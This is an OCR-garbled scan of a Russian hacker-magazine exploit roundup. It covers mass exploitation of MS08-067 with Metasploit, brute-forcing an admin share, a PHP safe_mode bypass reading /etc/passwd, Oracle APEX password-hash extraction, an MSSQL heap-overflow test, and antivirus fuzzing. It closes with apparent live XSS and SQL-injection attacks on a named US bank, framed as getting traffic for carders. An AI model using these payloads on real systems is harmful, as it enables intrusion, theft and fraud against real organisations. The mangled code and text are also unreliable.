раньше для организации сего деяния пришлось бы написатьтуеву 
хучу скриптов, то с Меіазріоіі: все стало проще. Нужно лишь выполнить 
несколько шагов. 

1. Грузим поддержку базы здІкеЗ: 

шзк > ІоаЬ сПэ_зд1ікеЗ [*] Зиссеззкиііу Іоасіесі ріидіп: 
ЬЬ_зд1ікеЗ 

2. Инициализируем создание новой базы данных: 

№7 



ІЗАДАЧА: 



РАСШАРЕННЫЙ РЕСУРС 
РЕШЕНИЕ: 

1. Составляем словарь для атаки. Допустим, это будет текстовый доку- 
мент из 1 00 слов, по одному на строку. Назовем его раззѵѵогсІз.М. 

2. Прямо из командной строки стб.ехе пишем следующую команду. 

ЕОК /Р "кокепз = 1*" %і іп (раззтлгогсіз . кхк ) Ьо пек изе 
; \\192 . 168 . 1 . 1\ІРС$ %і /и : Асітіпізкгаког 



шзк > ЬЬ_сгеаке [ * ] ТЬе зресікіесі ЬакаЬазе 
аІгеаЬу ехізкз, соппескіпд [ * ] Зиссеззкиііу 
соппескеі ко кЬе ЬакаЬазе[*] Рііе: /гоок/. 
шзкЗ/здІікеЗ . ЬЬ 

Для ускорения нашихтестов будем использовать встроенный модуль 
ЫМАР’а по сетевому диапазону: 

шзк > сПэ_пшар -зЗ -Р3445 -р445 -п -Т Аддгеззіѵе ААА.ВВВ. 
ССС. 0/24 

3. Финал сей пьесы — запускаем массрутинг по уязвимости тз08-067: 

шзк > ЬЬ_аикорші -е -р -Ь -ш тз08_067 

Р.З. Для сбора статистики по активным полученным шеллам вбивай 
команду тзі" > зеззіопз -I. 




Брутфорсзапароленной шары 

3. Радуемся быстрому процессу перебора. 

Р.З. Способ актуален только при атаке на пароль администратора. 
Использование брутфорса на другие логины сразу приведет к блокиро- 
ванию учетной записи. пт 
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АНДРЕЙ «5КѴ02» КОМАРОВ 
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На дворе месяц май, но мучения разработчиков в эту весеннюю пору не 
ослабятся. Наряду с ними мучиться будут и пользователи. С помощью 
свежей Х55 всего за пару часов были украдены более 5000 аккаунтов 
«Вконтакте.ру». Последняя 5ТАВІ_Е- версия ядра І_іпих страдает от 
повышения привилегий, известные брендовые железки СІ5С0 А5А/ 
РІХ некорректно справляются с фрагментированными ТСР- па кета- 
ми, а в последней версии РНР 5.2.9 появились новые способы обхода 
заіе_тосІе и ореп_ЬазесІіг. Впечатлен? Впрочем, апрельтакже был не 
слишком ровным. За тот месяц Місгозоіі выпустила 8 важнейших бюл- 
летеней по безопасности, пять из которых имеют критический урон по 
безопасности (М509-009, М309-010, М309-013, М509-014, МБ 09 - 011 ). 




ОБХОД ОГРАНИЧЕНИЙ В РНР 5.2.9 



»Вгіе* 



Задача обхода 5а1е_тос1е и ореп_ЬазесІіг крайне актуальна (например, 
это существенно ограничивает действия хакера, даже при наличии 
загруженного веб-шелла]. По сути, уязвимость была найдена в сторон- 
нем продукте — библиотеке ІіЬсигІ, которую поддерживает РНР. Сигі — 
известное средство для взаимодействия с Сетью и соответствующими 
протоколами — часто применяется при написании клиент-серверных 
приложений и в порти рова ином виде присутствует практически в любом 
языке программирования. Рассмотрим простой пример кода: 

сшг1_зекорк ( $сіі, С1ЖЬОРТ_1ЖЬ , «ііііе: ііііе: ////екс/раззж1>>) ; 

Вызов подобной функции подразумевает под собой следующее. Сна- 
чала Сигі обращается кданным включенного 5аІе_тос1/ореп_Ьа5есІіг 
и проверяет их правилами «Іі1е:////еіс/раз5ѵѵс1». Замечу, что реальный 
файл — «./ііІеУеіс/раззѵѵсІ», просто в параметрах функции мы умышлен- 
но поставили лишние слеши. Как ни странно, после такой махинации 
с целевой системы все равно локально будетсчитан файл «Р1е:////е1:с/ 
раззѵѵсі» (он же/еіс/раззѵѵсі]. Фишка некорректного распознавания 
может привести кочень неприятным последствиям. 



»ТагдеІ5:| 



рбр 5.2.9 



» Ехріоід 



В Сети был обнаружен абсолютно невнятный код эксплойта от 
БесигіІуРеазоп ( зесигіІѵгеазоп.сот/асЬіеѵетепІ ехріоііаіегі/і 1 ] в шиф- 
рованном виде и нерабочем состоянии. Итак, воссоздаем следующую 
иерархию папок(«Е1е:» в данном случае является папкой): 

.тіе:/ 

. / ііііе : /еДс/ 

. / ііііе : /екс/разз Ѵ7СІ/ 

Делаем сценарий такого рода: 

# ! /Ъіп/зіі 
гпкБІК ( " ііііе : " ) ; 
сксііг ( " ііііе : " ) ; 
гпкБІК ( " екс " ) ; 
сксііг ( " екс" ) ; 
шкБІЕ ( "разз^сі" ) ; 
сМіг 
сіісііг 

$сЪ. = сиг1_іпік ( ) ; 
сиг1_зекорк ($сЬ, СШЬОРТЩШЬ, 

" ііііе : ііііе: ////екс /раззѵѵсі" ) ; 
сиг1_зекорк ($ск, СШЬОРТ^НЕАШК , 0); 
сиг1_ехес ( $сіі) ; 
сиг1_с1озе ( $сіі) ; 
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Пока никакого патча не вышло. Остается лишь полагаться на воз- 
можности безопасного режима РНР и использоватьдополнительные 
средства безопасности ОС. 

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕ- 
ГИЙ В І_ШУХ (ЭКСПЛУАТАЦИЯ ЕХІТ_ 
ЫОТІРѴО) 



» Вгіе{ 



Эксплуатация уязвимости заключается в отсылке системных сигналов 
дочернему процессу (уже имеющему зиісі). Системных сигналов или 
сообщений существует очень много; нарядус ними естьеще некие«спо- 
собности» (сараЬіІіііез). По сути, это привилегии программ совершать 
какие-либо действия: открывать РАѴѴ-сокет, изменять владельца файла, 
перезагружать компьютер, подгружать модули ядра и такдалее. Естест- 
венно, многие из этих«способностей» и близко не нужны в штатном 
софте, иначе из них получается настоящее оружие либо злонамерен- 
ный софт для удержания привилегий в системе (или наоборот— порчи 
чужого имущества]. 

Начнем с краткого обзора наиболее важных «возможностей» ПО в среде 
Ыпих: 

САР_8ЕТ1ЛБ — управляет способностью гооб ' овых программ 
сменять пользователя, под которым работает программа 
САР_8ЕТОІБ — управляет способностью гооб ' овых программ 
сменять группу, под которой работает программа. Так 
работает, например, кббрб, зепбтаіі, розббіх, ббрб, 
забе_Піпдег 

САР_НІББЕК — способность программ делаться невидимыми 
в списке процессов. Не влияет на все программы 
САР_ШІТ_КІЬЬ — способность убивать процессы-потом- 
ки процесса іпіб. К таким относятся практически все 
демоны 

САР_8У8_СНКООТ — управляет способностью устанавливать 
корневой каталог для текущего зЬеІІ'а 

САР_Р8ЕТІБ — запрещает/разрешает установку ЗІЛБ'ного 
или ЗСІБ'ного бита на чужих файлах (не принадлежащих 
гооб 'у) 



сывать выходной сигнал на БІОСНЮ (сигнал, посылаемый програм- 
мой, когда дочерний процесс терминирован]. Ошибку причисляют к 
классу Оезідп еггог («ошибка в проектировании»]. 



» Ехріощ 



Скачать эксплойт можно, скажем, с нашего сайта по ссылке — ѵѵѵѵѵѵ. 
ха кер.ги/ро 5 І:/ 47784 / 1 _іп их- Кегпеі.- 1 _оса[-Ргіѵі [еде- Езсаіабоп- 
ЕхрІоіЕІхЕ 



»ТагдеІ5:| 



Реализуется практически на всех редакциях Ыпихс кегпеі <2.6.29, в 
том числе, достаточно защищенных дистрибутивах вроде ТгизбхЗесиге 
Епіегргізе Ыпих 2.0, ТгизбхЗесиге І_іпих2.2, ТгизбхЗесиге І_іпих2.1 , 
ТгизбхЗесиге Ыпих 2.0. Исключение составляет Ыпих кегпеі 2.6.29 -ді114. 



>>5оІиІіоп 



Уязвимость устраняется модификацией исходного кода ядра в 
соответствующей функции: 

бібб --діб а/кегпеі/ехіб . с 
Ь/кегпеІ/ехіб . с 
іпбех 6686еб1. .32сЬб2б 
100644 ( Іііе) 

а/кегпеі/ехіб . с 

+++ Ъ/кегпе1/ехіб . с 

@@ -837,8 +837,7 @@ збабіс ѵоіб ехіб_побібу ( збгисб базк_ 
збгисб *бзк, іпб дгоир_беаб) 

*/ 

і! (бзк->ехіб_зідпа1 != ЗІССНЬБ && !базк_ 
бебаскеб (бзк) && 

(бзк->рагепб_ехес_іб != бзк->геа1_рагепб->зе1б_ 
ехес_іб I I 

бзк->зе1б_ехес_іб != бзк->рагепб_ехес_іб) && 

! сараЫе (САР_КІЬЬ) ) 

+ бзк->зе1б_ехес_іб != бзк->рагепб_ехес_іб) ) 

бзк->ехіб_зідпа1 = ЗІССНЬБ; 

зідпаі = бгасекоок_побібу_беабк (бзк, &соокіе, 
дгоир_беаб) ; 

кббр : / /рабскѵтогк . кегпеі . огд/рабск/16544 / 




Кое-какие из этих возможностей будет полезно контролировать. 

Одно из средств, организующих контроль — это І_ЮЗ (Ыпих Іпігизіоп 
Оеіескоп Зузіет]. Оно представляет собой патч ядра, значительно 
повышающий безопасность при работе с ОС (читай — аналог проекта 
дгзесигку, не та к давно описанного на страницах ц-с). Занимательная 
особенность 6105 в том, что нацелен он не совсем на контроль дейст- 
вий пользователя (это можно сделать и штатными средствами Ыпих] 
и даже не на обнаружение сетевых аномалий, а на предотвращение 
инцидента, когда злоумышленнику уже удалось пробраться в систе- 
му и даже получить привилегии гооЕа. По сути, это защита от нежела- 
тельных «гоо1»-действий, которые может выполнить хакер, захватив 
систему. Ты заранее определяешьте действия, которые, даже будучи 
пьяным, никогда не попробуешь исполнить. И отключить модуль 
можно, только введя добавочный пароль, установленный админист- 
ратором. Однажды, изучая возможности этой системы, я решил 
пошутить над своим коллегой — запретил перезагрузку системы 
(отключение САР_5Ѵ5_В00Т]. Происшедшее долго приводило его 
вместе с коллективом в недоумение. При настройке конфигурации 
системы ты просто отмечаешь вконфигахЫОЗ эти пункты плюсами и 
минусами, после чего перезагружаешься. САР_КІІ_І_ включаетлибо 
отключает способность гооЕовых процессов убивать чужие процессы 
и, соответственно, преодолевает существующие ограничения на 
отправку системных сигналов. Ошибка содержится в функции ехк_ 
п оіібу (] (Ііпих/кегпеІ/ехіЕс]. Перед выходом вредоносное приложение 
может выполнить зеіи ісі . Это будет означать, что мы не будем сбра- 



РАСКРЫТИЕХЭШЕЙ ПАРОЛЕЙ 
В ОРАСЬЕ АРЕХ 



» Вгіел 



АРЕХ — известный проект 0 гасіе, ранее называвшийся Огасіе НТМІ_- 
0 В, предназначен для создания ѴѴЕВ-приложений и используется в 
качестве фреймворка. Для этого он устанавливается в непосредствен- 



Редкий случай, когда Заіе Мобе на хосте отключен, а сІЛ9І_ — собран. С 
недавним появлением способа обхода этой фичи названные вещи друг 
друга компенсируют 
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Полный список«возможностей» ПО на Біпих содержится в тап 



ной связке с СУБД Огасіе, АрасЬе или встроенным ѴѴЕВ-сервером 
в некоторые редакции Огасіе Баіабазе (Ехргезз ЕбіБоп, к примеру] 
ЕтЬесІсІесІ РБ/БББ Оаіеѵѵау (ЕРО). 

Проблема в том, что пользователь с недостаточными для этого правами 
может обратиться кспециальнозарегистрированным приложением 
таблицам, после чего — напрямую запросить данные других пользова- 
телей. 



» Ехріоіі 
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жЮІіІ 



№ РЙ. ІЧ" Щтг Щ р ІГи Ц. ІМЧ 
2 

ОГ?ЛОБЕ Еяргт 






Б* В 

кшмШІн 



і№йіі| 



■Я* г 1 1 -м .4.4 іи^. 



мРшт 



* шшуктѵжнор 



ЦФІН 



□ | - 4 Р-^-ѵ >тгѵ* 

Огасіе АРЕХ собственной персоной 



ЕЬСЖЗ_030000 .ШѴ_РЬОМ_иЗЕК5 . РАЗЗШКВ_ЫЕЕЗРАЫ_АССЕЗЗЕЗ 
ЕЬ(Ж8_0 3 000 0. Ѵ\МѴ_РЬОѴ\І_ІІЗЕКЗ . РАЗЗѴЮКВ_АССЕЗЗЕЗ_ЬЕЕТ 
ЕЬ(Ж5_0 3 000 0. ТШѴ_РЬ(Ж_ВЗЕКЗ • РАЗЗШКВ_ВАТЕ 
# забираем хэши 




Выполнить подключение кбазе или получить возможность использова- 
ния запросов кней — вотодна из наиболее важныхзадач для реализа- 
ции уязвимости. Традиционно в качестве средства подключения к Огасіе 
можно использовать здіріиз [ огасІе.сотЛесбпоІоаѵЛесЬ/здІ ріиз/іпсіех. 
Мт!). 



3<2Ь> зеіесб изег_пате ,^еЬ_разз^огб2 Ргош РЬ01лІЗ_03 00 00 . 
ШД/_РЬ(Ж_ВЗЕКЗ 

В8ЕК._ЫАМЕ МЕВ_РАЗЗЖЖВ2 



# выполняем подключение 
здіріиз Іодіп/разз 

# запрашиваем текущее наше состояние и убеждаемся в том, 
что мы подключены 

3<2Ь> зеіесб дгапбеб_го1е Тгош изег_го1е_ргіѵз ; 

# запрашиваем всю информацию о владельце и таблицах, ос- 
новываясь на известном АРЕХ 

30Ь> зеІесВ оѵліег , ВаЫе_паше Тгош а11_баЫез ѵтЬеге 
оѵдаег = 1 РЬ(ЖЗ_0 30000'; 

ОШЕЕ ТАВЬЕ_ЫАМЕ 



РЬ(ЖЗ_0 3 0 000 ШѴ_РЬ01лГ_ВВАЫ о о 
ЕЬ(ЖЗ_0 3 0 000 ШѴ_РЬ01л/_ЕОѴ_ТЕМР 
ЕЬ(ЖЗ_0 3 0 000 ШѴ_РЬ01лГ_ТЕМР_ТАВЕЕ 

# запрашиваем список мест, содержащих поле «Раззѵтогб» 
30Ь> зеіесб оѵтег I Г . ’ I I ВаЫе_паше I I 1 . ’ I I со1ишп_паше 
Тгот а11_баЬ_со1итпз ѵіЬеге со1итп_пате Ііке 1 %РАЗЗЖЖВ% 1 
апб оѵтег Ііке 1 %ЕЬ(ЖЗ_03 00% 1 ; 

ОШЕЕ I Г . ’ I I ТАВЬЕ_ЫАМЕ | Г . 1 | I СОШШ_ЫАМЕ 



ЕЪСМЗ_03 0000. ШѴ^ЪСЖГВЗЕКЗ . СШШСЕ_РА8 ЗѴЮКВ_(Ж_Р I КЗТ_ІІ 3 Е 
ЕЬ(ЖЗ_0 3 0000. ТШѴ_РЬ01лГ_ВЗЕКЗ . ЕІКЗТ_РАЗЗЮКВ = ВЗЕ_ОССШЖЕВ 
РЬ(ЖЗ_0 3 0 000. ШГѴ_ЕЬОТлГ_ВЗЕКЗ . Ѵ?ЕВ_РАЗЗЮКВ_КАѴГ 
РЬОШЗ_03 0 000. ШГѴ_ЕЕ01лМЗЗЕКЗ . ШЕВ_РАЗЗШКВ2 
РЬОШЗ_03 0 000. ШѴ_ЕЬСМ_ВЗЕКЗ . ШЕВ_РАЗЗШКВ 
РВСЖЗ_030000 . ѴШѴ_ЕЬ01л[_ВЗЕКЗ . РАЗЗШКВ_ЫЕЕЗРАВ_ВАУ8 



УШІ 141РА790354РВ6С72802РВЕА86353Р31 

Полученные хэши могут быть проанализированы с помощью утилит 
вроде Рерзсап. 



»ТагдеІз| 



Версии базы с подключенным Огасіе АРЕХ. 



»5оІи1іоп 



Компания своевременно выпустила набор исправлений «Огасіе СРБ 
Аргі 1 2009». 




ПЕРЕПОЛНЕНИЕ КУЧИ В М550І. 
5ЕКѴЕК5Р_РЕРІ_ѴѴтТЕТ0ѴАКВІМ 



» Вгіеп 



Переполнение найдено в одной из процедур МБ БОБ Бегѵег. Уязви- 
мость позволяет пользователю вызывать отказ в обслуживании либо 
исполнить произвольные команды на удаленной системе путем вызова 
бажной процедуры саномальными параметрами, которые запишут 
данныеза границами буфера. 



»ТагдеІз| 



Подверженные продукты: Місгозо1і50Б5егѵег20005Р4, 8.00.2050, 
8.00.2039 и еще более ранние версии, 50Б5егѵег2000 Безкіор Епдіпе 
(М5БЕ 2000) 5Р4; БОБ5егѵег2005 5Р2 (+9.00.1399.06 включительно], БОБ 
Бегѵег2000 Безкіор Епдіпе (ѴѴМ5БЕ). 



|» Ехріоіізі 



Боевой кодэксплоита оформлен в виде АБР-приложения, которое 
организует четыре запроса для записи четырех байтов в участок памяти, 
пригодный для этого, а затем используетэто адресное пространство для 
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Успешное подключениес помощью зціріиз кбазе Огасіе 



Столь небезопасную внутреннюю процедуру стоитуберечь от попытки 
использования всем и вся 



М#|- 

Ги#- 



перезаписи указателя функции. Важно понимать, что эксплоит не имеет 
никакой ценности, если хакер не является доверенным пользователем. 
В дефолтовой конфигурации заявленная хранимая процедура доступна 
каждому авторизированному в базе пользователю. Для того, чтобы это 
исправить, можно выполнить следующий запрос на Т-501: 



Если она, правда, имеется, —ты получишьошибку невозможности обра 
ботать исключение по адресу «0x41 414141». 



ЕХЕСИТЕ шазСег . ОЬо . 8Р_ВЕОРЕХТЕШЕБРЕОС ' зр_ 
герІѵтіСеСоѵагЪіп 1 

Мы удалим хранимую процедуру. Если не хочешьтак поступать, можно 
просто ее отключить: 

изе [тазСег] 

СО 

ЕЕѴОКЕ ЕХЕСБТЕ (Ж [зуз] . [ зр_гер1шгіЦеСоѵагЬіп] ТО 
[риЫіс] 

СО 

Проверить наличиеуязвимости можно следующим сценарием на Т-50Б: 

БЕСЬАЕЕ ©Би! ЫѴАЕСНАЕ ( 4 0 0 0 ) , 

©ѵаі БУАЕСНАЕ ( 4 ) , 

©соипБег ШТ 

ЗЕТ ©Би! = 1 
Бесіаге ©геБсосІе іпБ , 

@еп(і_о^ПзеЦ іпБ , 

©ѵЬ_Ьи^Пег ѵагЪіпагу, 

©ѵЬ_ЬиП^ег1еп іпБ , 

©Би! пѵагсБаг; 

ехес тавБег .БЬо. зр_гер1ѵягіБеБоѵагЬіп 1, 

©епсЩобіізеі: оиСриС , 

©ѵЬ_Ьи^Пег оиСриС , 

©ѵЬ_Ьи^Пег1еп оиСриС , ' 1 ' 

ЗЕТ ©ѵаі = СНАЕ ( 0x41 ) 

ЗЕТ ©соипБег = 0 
ШІЬЕ ©соипБег < 3 000 
ВЕСШ 

ЗЕТ ©соипБег = ©соипБег + 1 
ЗЕТ ©Би! = ©Би! + ©ѵаі 
ЕБВ 

ЗЕТ ©Би! = ©Би! + ' ' ' , ' ' 1 * Щ * » 1 1 ' , * * Ѵ : • , 

ЕХЕС шазСег. . зр_ехесиСезр1 ©Ьиі 



>>5оІиІіоп 



Уязвимость не качается М550Е5егѵег2008. В свою очередь, МісгозоИ 
присвоила уязвимости идентификационный номер «М509-004» 

[ т іеговой, сот Десбпеі/5есигіІѵ/абѵІ50гѵ/961 040. тзрх ] , до п ол н ител ь- 
ную инфу по которому™ сможешь найти в два клика. Более подробно 
почитать об отключении хранимых процедур можно здесь («Ретоѵіпд 
ап Ехіепсіесі Зіогесі Ргосесіиге ігот ЗОБ Зегѵег» — тзбп.тісгозоД.сот/ 

). 




Е5ЕТ N0032 — ОБХОД АНАЛИЗА 



» ВгіеЯ 



Зачастую сами же средства безопасности содержат в себеуязвимос- 
ти. Например, драйвера современных антивирусных проектов кишат 
ошибками при обработке исключений, а также в реакции на внедрение 
аномалий. Тут и Казрегзку I піегпеі: Зесигііу (кН .зуз], и Оеіюпсе ѴѴаІІ 
(сіѵѵа ІІ.зуз] , Аѵі га Ргетіит Зесигііу (аѵдпШ.зуз], ВіШеІепбегТоІаІ 
ЗесигТу 2009 (ЬсКпсІізЕзуз], 2опеА1агт ЗесигТу ЗиТе (згезсап.зуз), 
Рапба СІоЬаІ Ргоіесбоп 2009 (АРРЕЕТ.5У5), I піегпеі: ЗесигТу 2009 (бзсііѵѵ. 
зуз]. Названные объекты были поражены с помощью фаззинга ІОСТБ- 
запросов с любыми методами ввода-вывода (о которых я нетакдавно 
упоминал, описывая уязвимость в драйвере РО Р] . Сейчас же тема в 
другом. Любой антивирус поддерживаетопределенное количество 
архивных форматов файлов (РАР, 21 Р, БНА и т.д .) . Библиотеки для 
распаковывания таких файлов разработчики антивируса часто пишут 
сами, и вотони-то могут быть подвержены уязвимостям. В докладе нас 
будут интересовать именно распаковщики архивных форматов файлов. 
В качестве методики проверки уязвимостей мы будем использовать ге- 
нерацию данных. Методы генерации можно разделить на интеллекту- 
альные, когда у нас есть спецификация тестируемого формата файлов, 
и неинтеллектуальные — когда подразумевается, что мы ничего не 
знаем отестируемом формате. 



|» Ехріоіізі 



Как правило, при использовании неинтеллектуального метода генера- 
ции нужно, чтобы до начала процесса генерации у нас был неиспорчен- 
ный (исходный] файл. 

1. Случайные данные. Пожалуй, один из самых примитивных и простых 
методов. Перезаписываем часть данных исходного файла случайными 
данными. 
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ОБЗОр 

эксплоитов 
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Місгозоіі была в курсе проблемы еще с 2008 года и подтвердила возмож- 
ность исполнения неавторизированного кода 



ОБЗОр 

эксплоитов 

I ! 

з_Ъіпагу( "41424344" ) ; 
з_Ыоск_епс1( " зотеіііесіака" ) ; 




Сначала скрипт добавляет 4 нулевых байта в выходной буфер. Затем 
добавляются еще 4 байта (0x41 424344). После завершения блока 4 
первых нулевых байта заменяются размером блока в азсіі-формате. 
На выходе получаются следующие данные: 4АВСО. После того, как 
мы разработали линейное представление формата файла в виде 
ЗРІКЕ-скрипта, мы можем пометить некоторые части скрипта как 
«переменные»: 



з_Ъ 1 оск_зІ 2 е_азсіі_ѵгс>гс 1 _ѵагіаЪ 1 е ( " зотеіііесіака" ) ; 



/ / числовая переменная 



2. Перестановка битов. Каждый раз при генерации испорченного файла 
меняем состояние бита исходного файла на противоположное. 

3. Блочный метод. На сегодняшний день — один из самых эффек- 
тивных методов генерации данных. Среди фаззеров, первыми 
реализовавших данный метод, был 5 РІ КБ (выпущен в 2002 Дэвидом 
Айтелом). Как работает блочный фа ззер (на примере 5РІКЕ)? Основа 
фазз ера — блок (список структур, содержащих информацию о раз- 
мере блока и другие произвольные данные). Рассмотрим простой 
ЗРІКЕ-скрипт: 

з_Ыоск_зІ 2 е_азсіі_ѵтогс! ( " зотеіііесіака" ) ; 

з_Ыоск_зкагк ( " зотеіііесіака" ) ; 



з_Ыоск_зкагк ( " зотеіііесіака" ) ; 

з_Ьіпагу_ѵагіаЫе (" 41424344 ") ; // строковая переменная 
з_Ыоск_епсЦ " зотеіііесіака" ) ; 

5РІКЕ содержит наборы чисел и строк (так называемые «плохие 
значения»), которые могут вызвать сбои в тестируемых програм- 
мах, например, числа: 0, -1 , 429496 729 5, 0, 0x40000000, ОхУШІШ и 
т.п., строки «%п%п%п%п», « \х 0 0 » , строки из симво- 

лов ‘А’ разной длины. В процессе ге не рации да иных 5РІКЕ за меня- 
ет очередную «переменную» числом или строкой из набора плохих 
значений, и те, вместо числовой переменной 5РІКЕ, будут по 
очереди подставлять 0, -1 , потом 4294967295 и т.д. После каждой 



Р-Ргоі вошел в бесконечный цикл и со всей дури тратит ресурсы машины 




КІ5 — загрузка центрального процессора почти максимальна 



§§/С Апбѵігиз не отличился образцовостью 
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ИНТЕРНЕТ 



АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



такой замены 5РІКЕ записывает выходные данные в очеред- 
ной файл. Для того чтобы не дискредитировать развитие ѴХ- 
кодеров и, соответственно, вендоров антивирусных компаний, 
намекаю на то, что подобной «едой» для антивируса можно 
завести его в бесконечный цикл или отказ в обслуживании. 

Это наблюдается и в N0032 со всеми последними обновлени- 
ями. Схожие уязвимости были обнаружены в: 

• ВіЫе^епсІег Апііѵігиз 2009 — неспособность корректно обрабаты- 
вать САВ-архивы; 

• Аѵазі! — некорректная обработка ВАВ-архивов; 

• РогІіпеІ — некорректная обработка архивированных файлов. 
Поэкспериментировать советую с фаззингом следующих 
форматов файлов: 2ір, 2ір 5ЕХ, АВф АВф 5ЕХ, ТАВ, 62, 200, 
ІІІІЕпсосІе, ТЫ ЕР, МІМЕ, ВІРІНЕХ, МЭСотргезз, САВ, САВ 5ЕХ, 
Е2Н, Е2Н 5ЕХ, І_НА, ВАВ, ВАВ 5ЕХ, ЗАВ, В22, Вазе64, Мае Віпагу, 
АЭРаск, СНМ, 000, ЕМЕ, ЕХЕ, Е56, НІ_Р, РОЕ, Ѵоба, ЕРЕ, РРТ, 
ОРЭ. 

Забавный пример — давным-давно антивирус Е-Роі: не ана- 
лизировал запароленные 2ІР-архивы. Это было очень легко 
отследить, потому что письма с аттачами, проходившие через 
продукты Е-Роі (Е-таіІ Оаіеѵѵау зсаппег, к примеру], приходили 
получателю с модифицированной темой, к которой добавлялась 
строка «АНасЬтепІ поі зсаппеб». 



»ТагдеІ 5 | 



• Е5ЕТ Этагі: Эесигііу 4 
•Е5ЕТІ\І0В32АпІіѵігиз4 

• Е5ЕТ 5тагі5есигі1:у4 Визіпезз Есііііоп 

• Е5ЕТ ЫОЭ32 АпІіѵіги5 4 Визіпезз Ебіііоп 

• Е5ЕТ N0032 Апііѵігиз бог Ехсбапде Эегѵег 

• Е5ЕТ МаіІЭесигіІу 

• Е5ЕТ N0032 Апііѵігиз бог Роіиз Оотіпо Эегѵег 

• Е5ЕТ ЕіІеЭесигіІу 

• Е5ЕТ ІЧоѵеІІ Ыеіѵѵаге 

• Е5ЕТ 0ЕЕЕ5Т0ВА6Е 5ЕВѴЕВ5 

• Е5ЕТ ЫОЭ32 АпІіѵігизІогЫпихдаІеѵѵаубеѵісез 



» 5 оІиІіоп 



Уязвимость обнаружена Твери Золлером [ Ыод.гоііег.іи ]. но 
подробности были раскрыты непосредственно только вен- 
дору. Удивительно, но реакция Е5ЕТ оказалась достаточно 
хорошей (выпуск обновления по истечении 14дней — езеР 
сот/зиррогі/ирсІаІе5.рІір?радепо=3 ). что говорит о готовности 
компании соблюдать рамки 50І_ и поддерживать безопас- 
ность продуктов, □с 



тспстпн интернет 

I Ь II ЬѴ и П ПОДКЛЮЧЕНИЕ БЕСПШКО 

* Подключение - п люЬом месте 
М о п к н ы и М опноисгК ай п-б л. 

* Срок ПОДИЯ ии чи мни а МйСК&й - 14 дней, 

В Московской обл . - от 14 до 30 дней. 

■ Устлнонкя прямого москапскога телефонного номера 

- Многоканальные телефонные номера 

■ 1 Р-телефонии 

■ Выделенные янки и Интернет 

* Корпоративные честные сети (ѴРМ) 

* Хостинг; услуги йаіа- центра 



РМ Телеком 

ѴгкѴМ.гЩТ^ п •тліРіпІай'тпіІ.гЫ [4Й&| 1ІН-Н ЙЗМЭ 
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Приглашаем специалистов, имеющих 
опыт работы в области телекоммуникаций 









корпоративный банкинг]. 

Бегло проанализировав скрипты, сразуже 
видим межсайтовый скриптинг: 



ЪДСр : / /ѵпт. зСаСеЬапк1898 . сот/ 
зеагск. азр?д=1&ЦхкЗеагс]і=%27%22%ЗЕ 
%ЗС%2РРіСІе%ЗЕ%ЗСзсгірС%ЗЕа1егР ( 13 
37 ) %ЗС%2Езсгірк%ЗЕ%ЗЕ%ЗСтагдиее%ЗЕ 
%ЗСк1%ЗЕХЗЗ+Ьу+зкѵ2%ЗС%2Ек1%ЗЕ%ЗС% 
2Етагдиее%ЗЕ&х=18&у=15 



Взломать банк?Только несегодня, — давайтезавтра. 

Что представляетсобой безопасность банковских ресурсов? 

Они активно охраняются законом, а также проходили аттестацию по 
стандарту РСІ 055, целькоторого повыситьзащищенностьэлект- 
ронныхиторговыхсистем. Но какэто выглядитна самом деле? 
Давай проверим! 



н РАЗМИНКА 

Моим друзьям кардерам часто нужен целевой 
финансовый трафик. Чтобы кто-нибудь 
когда-нибудьтакой трафик продавал на 
своем сервисе — это миф. Поэтому подоб- 
ные предложения всегда актуальны. Хакер 
может и не получить доступ конлайн-бан 
кингу (потому, что тот будет на стороннем 
сервере], зато появится возмож 
ность заразить очень много 
посетителей, часть из которых, 
естественно, является прямой 
клиентурой. 



ЦЕЛЬ: 5ТАТЕВАМК1898. 
СОМ (США) 



Это крупный банк, который 
расположен в США и пре- 
доставляет практически 
полный наборуслугпо 
платежи о -ка рточ- 
ному сервису 
(АТМ, персо- 



нальный и 






ІГі 
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взлом 




БББр: / /шт. зБаБеЬапк1898 . сот/пеѵ^з . 
азр?ісі=6 ' 

МісгозоББ ОБЕ БВ Ргоѵісіег Бог ОБВС 
Бгіѵегз еггог '80040е14' 

[МуЗОБ] [ОБВС 3.51 Бгіѵег] 
[тузд1с1-5 .1.3 0 -соттипіВу ] Уои 
Баѵе ап еггог іп уоиг ЗОБ зупБах; 
сБеск ББе тапиаі ББаБ соггезропсіз 
Бо уоиг МуЗОБ зегѵег ѵегзіоп Бог 
ББе гідББ зупБах Бо изе пеаг ' ' 
ОКБЕК ВУ розБ_сіаВе БЕЗС,ісі БЕЗО' 
аБ Ііпе 1 
/пемз.азр, Ііпе 54 

Узнаем пользователя: 

зБаБеЬапк1898 . сот/пемз . азр?і<б=6+А 
ББ+1=2+ШІ(Ж+5ЕЕЕСТ+0 ,изег ( ) ,2,3, 

4.5.6 

Ответ базы — «зЫЬа рругисі іеС3208. 1 09.78. 1 17» 
— говорил о том, что все крутилось-верте- 
лось на удаленном сервере, а не офсайте 
(64.202.1 78.162]. По логике вещей, там должен 
крутиться процессинг, выявляемый по нали- 
чию всего двух портов (443-55І, 21 -іір] : 

зБаБеЬапк1898 . сот/ пемз . азр?ісІ=6+А№ 
Б+1=2 +ІШІСЖ+ЗЕБЕСТ+0 , сІаБаЪазе 0,2, 

3 .4.5.6 



зБаБеЬапк1898 . сот/пемз . азр?іс! 
=6+АББ+1=2 +ІШІСЖ+ЗЕЕЕСТ+0 , БаЫ 
е_пате , 2 , 3 , 4 , 5 , 6+Бгот+іпБогтаБіоп_ 
зсБета . БаЫез+ШЕКЕ+БаЫе_ 
зсБета=%27зЪББарругис1іе%27 

Названиятаблицоказались весьма интерес- 
ными: Брсобе, изегз, ирІоабз_паѵйІе, иріоабз, 
5ІаІе5, гаІе_уѵаІсЬ, ргезз, опІіпе_Ьапкіпд, тазіег, 
^ац_са1:едогу р іац, сизОт, сопіепі, Ьгапсб, Ьаппегз. 
Просмотр колонок каждый раз осуществлялся так: 

зБаБеЬапк1898 . сот/пемз . азр?іс!= 
6+АББ+1=2+ІЖІСЖ+ЗЕЕЕСТ+0 , соіиш 
п_паше , 2 , 3 , 4 , 5 , 6+Бгош+іпБогшаБіоп_ 
зсБета . со1итпз+ШЕКЕ+БаЫе_ 
паше=%27оп1іпе_Ьапкіпд%27 

Ответ базы: зогі_огсІег, Іодоп_и гі, іб, асбѵе, 
ассоипБ 

